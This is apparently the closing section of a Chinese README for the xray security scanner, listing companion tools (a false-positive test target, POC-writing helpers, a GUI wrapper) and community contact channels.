参照: https://docs.xray.cool/#/guide/contribute
## 🔧周边生态
### POC质量确认靶场
[**Evil Pot**](https://github.com/chaitin/xray/tree/master/tests/evilpot)
[Releases](https://github.com/chaitin/xray/releases?q=EvilPot&expanded=true)
一个专门用于让扫描器产生误报的靶场
编写插件应该尽量避免能在这个靶场扫描出结果
### POC编写辅助工具
该工具可以辅助生成POC,且在线版支持**poc查重**,本地版支持直接发包验证
#### 在线版
- [**规则实验室**](https://poc.xray.cool)
- 在线版支持对**poc查重**
#### 本地版
- [**gamma-gui**](https://github.com/zeoxisca/gamma-gui)
### xray gui辅助工具
本工具仅是简单的命令行包装,并不是直接调用方法。在 xray 的规划中,未来会有一款真正的完善的 GUI 版 XrayPro 工具,敬请期待。
- [**super-xray**](https://github.com/4ra1n/super-xray)
## 📝 讨论区
各位开发者和 xray 粉丝们,欢迎来[讨论区投票](https://github.com/chaitin/xray/discussions/1804),决定 xray 2.0 工具的开发优先级,让你的声音塑造 xray 的未来! 🚀
提交误报漏报需求等等请务必先阅读 https://docs.xray.cool/#/guide/feedback
如有问题可以在 GitHub 提 issue, 也可在下方的讨论组里
1. GitHub:
- https://github.com/chaitin/xray/issues
- https://github.com/chaitin/xray/discussions
2. 微信公众号:微信扫描以下二维码,关注我们
3. 微信群: 请添加微信公众号并点击"联系我们" -> "加群",然后扫描二维码加群
4. QQ 群: 717365081
## Star History
[](https://star-history.com/#chaitin/xray&Date)
================================================
FILE: README_EN.md
================================================